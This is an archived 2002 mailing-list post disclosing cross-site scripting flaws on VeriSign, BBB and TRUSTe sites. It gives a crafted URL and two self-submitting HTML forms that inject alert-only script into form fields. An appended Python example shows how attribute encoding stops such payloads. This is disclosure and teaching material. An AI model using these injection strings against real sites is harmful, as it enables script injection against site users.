Vulnerability Development mailing list archives
CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org.
From: Liu Die Yu <liudieyuinchina () yahoo com cn>
Date: 16 Jul 2002 07:37:10 -0000
CSS(Cross-Site Scripting) at digitalid.verisign.com, www.bbb.org & www.truste.org.

---== *Useful* info==---

[1]. digitalid.verisign.com is the *sign* of VeriSign. Unfortunately, it is CSS vulnerable.

CODE: URL
https://digitalid.verisign.com/cgi-bin/Xquery.exe?Template=&form_file=../fdf/authCertByIssuer.fdf&issuerSerial=9cef871936b857a17a7d8bb1810ac742"><P STYLE="left:expression(eval('alert(\'boop\')'))">
(Passed using MSIE 5.5)

[2]. www.bbb.org is the body of BBB. Again, CSS vulnerable.

CODE: .HTM file
----------cut-here---------
<html>
<body>
<form NAME="theform" ACTION="http://www.bbb.org/contact/promail.asp" METHOD="POST">
<input type="text" name="username" size="10000" Value=""><SCRIPT>alert("boop");</SCRIPT>">
<input type="submit" value="Submit" name="btnSubmit">
<input type="reset" value="Reset" name="btnReset">
</form>
<script>
theform.submit();
</script>
</BODY>
</html>
----------cut-here---------
(Passed using MSIE5.5)

[3]. www.truste.org is not trustable for CSS at present.

CODE: .HTML file
-------Cut-here-----------
<html>
<body>
<form name=theform action="http://www.truste.org/cgi-mojo/mojo.cgi" method=POST>
<input type="text" name="email" size="12345" value=""">><SCRIPT>alert("boop");</SCRIPT>">
<input type="submit" style='font-size: 12px; font-family:arial,verdana, sans-serif; background-color: #CC9966; color: #000000; font-weight:bold;border-style:groove' value="Signup">
</form>
<SCRIPT>
theform.submit();
</SCRIPT>
</body>
</html>
-------cut-here----------
(Passed using MSIE5.5)

[4]. Note: for info on CSS, visit cert.org

---==Contact me==---

email: LiuDieYuInChina () yahoo com cn.NOSPAM:)
I am a student in the Xiang Tan University in HN,CN; My handle is Liu Die Yu.
Glad to be your friend.

---==fOR FUN==---

Can anyone send a postcard(NOT A BOMB) to me?
Postal Address: #B102 Xiang Tan Da Xue,411105,Hu Nan,CHINA

---==Sth serious(but not technical)==---

It is even hard to imagine that these sites, which are important sites for online business, are CSS vulnerable. I think the security agencies are fooling around.
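
Added example, not part of the original post: each test case above sends `">` followed by new markup, which only works if the server echoes the parameter into a quoted HTML attribute without encoding it. The Python sketch below uses a hypothetical template (`render_unsafe` and `render_safe` are names assumed here; the sites' server code does not appear in the post) and parses the output to show the echoed value leaving the attribute, and attribute encoding keeping it inside.

```python
from html import escape
from html.parser import HTMLParser

# Constructed inputs: the values submitted in the post's test cases.
PAYLOADS = [
    '"><SCRIPT>alert("boop");</SCRIPT>',
    r'''"><P STYLE="left:expression(eval('alert(\'boop\')'))">''',
]

def render_unsafe(value):
    # Hypothetical template: echoes the parameter into the attribute verbatim.
    return '<input type="text" name="email" value="' + value + '">'

def render_safe(value):
    # Same template with &, <, >, " and ' encoded for attribute context.
    return '<input type="text" name="email" value="' + escape(value, quote=True) + '">'

class TagCollector(HTMLParser):
    """Records every start tag and the value attribute of the input element."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")

def inspect(markup):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_value

def stays_in_attribute(markup, value):
    # True only if the page contains one element and the echoed text is
    # exactly the submitted value, i.e. nothing broke out of the attribute.
    tags, echoed = inspect(markup)
    return tags == ["input"] and echoed == value

if __name__ == "__main__":
    for payload in PAYLOADS:
        print("unsafe:", inspect(render_unsafe(payload))[0],
              "safe:", inspect(render_safe(payload))[0])
```
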